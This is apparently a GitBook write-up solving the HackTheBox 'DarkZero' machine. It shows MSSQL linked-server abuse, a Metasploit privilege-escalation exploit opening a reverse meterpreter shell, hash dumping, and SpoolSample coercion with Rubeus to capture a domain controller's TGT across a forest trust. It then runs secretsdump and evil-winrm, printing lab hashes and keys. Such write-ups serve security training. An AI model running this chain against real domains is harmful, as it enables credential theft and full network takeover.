> For the complete documentation index, see [llms.txt](https://xenon-2.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://xenon-2.gitbook.io/writeups/hackthebox/boxes/darkzero.md). # DarkZero ### User Use of MSSQL Linked Servers to gain user access to `DC02.darkzero.ext` from `DC01.darkzero.htb` ```bash impacket-mssqlclient john.w@DC01.darkzero.htb -windows-auth Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies Password: [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(DC01): Line 1: Changed database context to 'master'. [*] INFO(DC01): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (160 3232) [!] Press help for extra shell commands SQL (darkzero\john.w guest@master)> enum_links SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT ----------------- ---------------- ----------- ----------------- ------------------ ------------ ------- DC01 SQLNCLI SQL Server DC01 NULL NULL NULL DC02.darkzero.ext SQLNCLI SQL Server DC02.darkzero.ext NULL NULL NULL useLinked Server Local Login Is Self Mapping Remote Login ----------------- --------------- --------------- ------------ DC02.darkzero.ext darkzero\john.w 0 dc01_sql_svc ``` Using a meterpreter payload from revshells.com, we can get a session on metasploit. We can proceed to enumerate all possible windows exploits using exploit suggester, and obtain a SYSTEM shell on `DC02` ```bash msf6 exploit(windows/local/cve_2024_30088_authz_basep) > run [*] Started reverse TCP handler on 10.10.16.20:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113 [*] Reflectively injecting the DLL into 6176... [+] The exploit was successful, reading SYSTEM token from memory... [+] Successfully stole winlogon handle: 608 [+] Successfully retrieved winlogon pid: 612 [*] Sending stage (203846 bytes) to 10.10.11.89 [*] Meterpreter session 3 opened (10.10.16.20:4444 -> 10.10.11.89:60473) at 2025-10-06 05:53:58 +0800 meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:6963aad8ba1150192f3ca6341355eb49::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:43e27ea2be22babce4fbcff3bc409a9d::: svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:816ccb849956b531db139346751db65f::: DC02$:1000:aad3b435b51404eeaad3b435b51404ee:663a13eb19800202721db4225eadc38e::: darkzero$:1105:aad3b435b51404eeaad3b435b51404ee:4276fdf209008f4988fa8c33d65a2f94::: meterpreter > help ``` ### Root Enumerating trust relationships with `poweview.py`, we see the following trust attributes ```bash ╭─LDAPS─[DC01.darkzero.htb]─[darkzero-ext\Administrator]-[NS:] [CACHED] ╰─PV ❯ Get-NetTrust objectClass : top leaf trustedDomain whenCreated : 29/07/2025 15:30:19 (2 months, 6 days ago) whenChanged : 29/09/2025 18:25:18 (6 days ago) name : darkzero.ext objectGUID : {dc96b90d-8181-4c7f-90df-54b9814a8c06} securityIdentifier : S-1-5-21-1969715525-31638512-2552845157 trustDirection : INBOUND OUTBOUND BIDIRECTIONAL trustPartner : darkzero.ext trustType : WINDOWS_ACTIVE_DIRECTORY MIT trustAttributes : FOREST_TRANSITIVE CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION flatName : darkzero-ext msDS-TrustForestTrustInfo : S-1-5-21-1969715525-31638512-2552845157 ``` We see the `ENABLE_TGT_DELEGATION` flag being set. Using `DC02` to monitor for incoming authentication requests, we can coerce authentication from `DC01.` ```bash ./r.exe monitor /interval:5 /nowrap PS C:\Users\Public> ./r.exe monitor /interval:5 /nowrap ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.0 [*] Action: TGT Monitoring [*] Monitoring every 5 seconds for new TGTs [*] 10/5/2025 11:25:25 PM UTC - Found new TGT: User : DC01$@DARKZERO.HTB StartTime : 10/5/2025 2:06:22 PM EndTime : 10/6/2025 12:06:20 AM RenewTill : 10/12/2025 2:06:20 PM Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable Base64EncodedTicket : doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDZT3UFtLPB4JgC3QH2e6BZFq9xYVoXdyrFoFkKLuox3JwDHDPB/3la8Z+5ZmEqHJWASBeuhMlog5zmxAwSTk8CDMyaHqH4FDRYaffJsvzZg9PG6oCh4XL/70vz7b5u/kRn9I93dPD5FH6X2yxW5FE31mQQPpIbrY7Zk4y702jwZJdbyT6SMkSa5JQTSE0CLwK6eFp6UI3nCsu+mK8KlQcy60ZVTF7OWWXdiQU2cVhOWF0LVEPQkRDDX4S6Ykx8lgIIlv7+ALJdxV+2mSaqyBxpwM6p/PjD6D6R7kVHPRczbHG/ncZi+a1bhMCDS01p4/JWot5+XypHIoccep7cd8VHY/Uz0KR+egMHMXp3mqNQ0Ka8aJvlP2wuXOK5hj5SKXotYODfwxs1YTcFeaSZ5oFE/oao7R/ZebTgNZCX+RUPOedXOfjjXIM5gXODRZi0PgbdriR7Cpt0NVoRUhlNgDvHsKOB4FPZDv5Qlo42CquJNPztDzYjzQo04lk+8J74UYmSFaPxwY0pDbV7p1CSr69D8BnrIa8oTId7ceInGae1A13vAgrbcAEDqU8FJ2Oc52Tm5bEQTvB6dqZWNMuwtKX7mEqAgiRKTEs4YuCFWJGD8QfNaKYHOhOuv4ZWFXqT72u9Xl9eiaxCoPYh4pBQ2quBL7OzGFQJ+LyRgLCtOeH323CQq49xrqge5CQKoYgiyy0UZoP8dOo03fHYv5x1WZCJk7Bgs3EoJnYoKXjK7OKgTT4slpG53j/7jV94Yv8p8ZGWnmkV9UTRf1CzpmcLkUDIzHAuQfBBJBt8hQsMEvM7uA56H8AnbcmjiW6E6Tlw68rQQGAbNzen/570JoJn7OekwkHWVijvQ1FKu0PDipnD+GB2s64tkmHh9S+Wr5khE6Kyh+gRd9ReRMD1rC4VE80PVRxDO4DzDgjPaFckl0xvVCR/ehpXc2YPh1wjNyjlU1/FG9V1XaY8mTQ5FzZxxvEYl5q2s/T3sl5opGssVvx1/32sLiCh0h/Uxgqe2HNT/sX9CdNhnd9tukWwql4H6QzzNnj6eAM8Tl1rKKCvTkoYN3tdrM/kpCbIazUN5jeVS7ZYijjlkLaL6Pz2LBWdKzIlrW1U/ORWp1rwhqhnHW6erd/Z7IhE3cFX5rjUhTlLnbYjAtZkwWzid7n6QNAoxoHMcwBQv8bAtr5en1c1C4YRe8LfJzXHLgeLth3/CccTnT3NSqWywdNbaSxnmNPoBLzk6oCZBYk0VSUr842X6DJ5viBIS3x9T7tfhtPsFXVUfcw9pxtT/mVSWvJcxFYOSRHWBrkW/EOysq1cY9brLMqgzjMWkMGaDTw7HWz1rqMjDPr7FjLFfEdRBNAVeCDPWeqGpeM9ESCPKoOmd/gjARBeMxuQTJ32O/j78J0AhYDLe2Vyv7KLRZRfPMIFZS5I2Lq98nLVIWWeao4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQg/9QHbWsj0SaSchM/AMma5dadsamgnvAZzGeId1GnyNehDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDUyMTA2MjJaphEYDzIwMjUxMDA2MDcwNjIwWqcRGA8yMDI1MTAxMjIxMDYyMFqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI= [*] Ticket cache size: 9 ## On another Terminal ./SpoolSample.exe DC01.darkzero.htb DC02.darkzero.ext ``` We can then use `ticketConverter` for interoperatibility between `.kirbi` and `.ccache` {% code overflow="wrap" %} ```bash echo "doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDZT3UFtLPB4JgC3QH2e6BZFq9xYVoXdyrFoFkKLuox3JwDHDPB/3la8Z+5ZmEqHJWASBeuhMlog5zmxAwSTk8CDMyaHqH4FDRYaffJsvzZg9PG6oCh4XL/70vz7b5u/kRn9I93dPD5FH6X2yxW5FE31mQQPpIbrY7Zk4y702jwZJdbyT6SMkSa5JQTSE0CLwK6eFp6UI3nCsu+mK8KlQcy60ZVTF7OWWXdiQU2cVhOWF0LVEPQkRDDX4S6Ykx8lgIIlv7+ALJdxV+2mSaqyBxpwM6p/PjD6D6R7kVHPRczbHG/ncZi+a1bhMCDS01p4/JWot5+XypHIoccep7cd8VHY/Uz0KR+egMHMXp3mqNQ0Ka8aJvlP2wuXOK5hj5SKXotYODfwxs1YTcFeaSZ5oFE/oao7R/ZebTgNZCX+RUPOedXOfjjXIM5gXODRZi0PgbdriR7Cpt0NVoRUhlNgDvHsKOB4FPZDv5Qlo42CquJNPztDzYjzQo04lk+8J74UYmSFaPxwY0pDbV7p1CSr69D8BnrIa8oTId7ceInGae1A13vAgrbcAEDqU8FJ2Oc52Tm5bEQTvB6dqZWNMuwtKX7mEqAgiRKTEs4YuCFWJGD8QfNaKYHOhOuv4ZWFXqT72u9Xl9eiaxCoPYh4pBQ2quBL7OzGFQJ+LyRgLCtOeH323CQq49xrqge5CQKoYgiyy0UZoP8dOo03fHYv5x1WZCJk7Bgs3EoJnYoKXjK7OKgTT4slpG53j/7jV94Yv8p8ZGWnmkV9UTRf1CzpmcLkUDIzHAuQfBBJBt8hQsMEvM7uA56H8AnbcmjiW6E6Tlw68rQQGAbNzen/570JoJn7OekwkHWVijvQ1FKu0PDipnD+GB2s64tkmHh9S+Wr5khE6Kyh+gRd9ReRMD1rC4VE80PVRxDO4DzDgjPaFckl0xvVCR/ehpXc2YPh1wjNyjlU1/FG9V1XaY8mTQ5FzZxxvEYl5q2s/T3sl5opGssVvx1/32sLiCh0h/Uxgqe2HNT/sX9CdNhnd9tukWwql4H6QzzNnj6eAM8Tl1rKKCvTkoYN3tdrM/kpCbIazUN5jeVS7ZYijjlkLaL6Pz2LBWdKzIlrW1U/ORWp1rwhqhnHW6erd/Z7IhE3cFX5rjUhTlLnbYjAtZkwWzid7n6QNAoxoHMcwBQv8bAtr5en1c1C4YRe8LfJzXHLgeLth3/CccTnT3NSqWywdNbaSxnmNPoBLzk6oCZBYk0VSUr842X6DJ5viBIS3x9T7tfhtPsFXVUfcw9pxtT/mVSWvJcxFYOSRHWBrkW/EOysq1cY9brLMqgzjMWkMGaDTw7HWz1rqMjDPr7FjLFfEdRBNAVeCDPWeqGpeM9ESCPKoOmd/gjARBeMxuQTJ32O/j78J0AhYDLe2Vyv7KLRZRfPMIFZS5I2Lq98nLVIWWeao4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQg/9QHbWsj0SaSchM/AMma5dadsamgnvAZzGeId1GnyNehDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDUyMTA2MjJaphEYDzIwMjUxMDA2MDcwNjIwWqcRGA8yMDI1MTAxMjIxMDYyMFqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=" | base64 -d > dc01.kirbi impacket-ticketConverter dc01.kirbi dc01.ccache Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] converting kirbi to ccache... [+] done impacket-secretsdump 'DC01$'@DC01.darkzero.htb -k -no-pass Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:64f4771e4c60b8b176c3769300f6f3f7::: john.w:2603:aad3b435b51404eeaad3b435b51404ee:44b1b5623a1446b5831a7b3a4be3977b::: DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d02e3fe0986e9b5f013dad12b2350b3a::: darkzero-ext$:2602:aad3b435b51404eeaad3b435b51404ee:95e4ba6219aced32642afa4661781d4b::: [*] Kerberos keys grabbed Administrator:0x14:2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd Administrator:0x13:a23315d970fe9d556be03ab611730673 Administrator:aes256-cts-hmac-sha1-96:d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd Administrator:aes128-cts-hmac-sha1-96:b1e04b87abab7be2c600fc652ac84362 Administrator:0x17:5917507bdf2ef2c2b0a869a1cba40726 krbtgt:aes256-cts-hmac-sha1-96:6330aee12ac37e9c42bc9af3f1fec55d7755c31d70095ca1927458d216884d41 krbtgt:aes128-cts-hmac-sha1-96:0ffbe626519980a499cb85b30e0b80f3 krbtgt:0x17:64f4771e4c60b8b176c3769300f6f3f7 john.w:0x14:f6d74915f051ef9c1c085d31f02698c04a4c6804d509b7c4442e8593d6d957ea john.w:0x13:7b145a89aed458eaea530a2bd1eb93bd john.w:aes256-cts-hmac-sha1-96:49a6d3404e9d19859c0eea1036f6e95debbdea99efea4e2c11ee529add37717e john.w:aes128-cts-hmac-sha1-96:87d9cbd84d85c50904eba39d588e47db john.w:0x17:44b1b5623a1446b5831a7b3a4be3977b DC01$:aes256-cts-hmac-sha1-96:25e1e7b4219c9b414726983f0f50bbf28daa11dd4a24eed82c451c4d763c9941 DC01$:aes128-cts-hmac-sha1-96:9996363bffe713a6777597c876d4f9db DC01$:0x17:d02e3fe0986e9b5f013dad12b2350b3a darkzero-ext$:aes256-cts-hmac-sha1-96:eec6ace095e0f3b33a9714c2a23b19924542ba13a3268ea6831410020e1c11f3 darkzero-ext$:aes128-cts-hmac-sha1-96:3efb8a66f0a09fbc6602e46f22e8fc1c darkzero-ext$:0x17:95e4ba6219aced32642afa4661781d4b [*] Cleaning up... ``` {% endcode %} evil-winrm to get the flag ```bash *Evil-WinRM* PS C:\Users\Administrator\Desktop> ls Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 10/5/2025 2:06 PM 34 root.txt -ar--- 10/5/2025 2:06 PM 34 user.txt *Evil-WinRM* PS C:\Users\Administrator\Desktop> type * ca2f5f1a32 82db32d8 ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://xenon-2.gitbook.io/writeups/hackthebox/boxes/darkzero.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.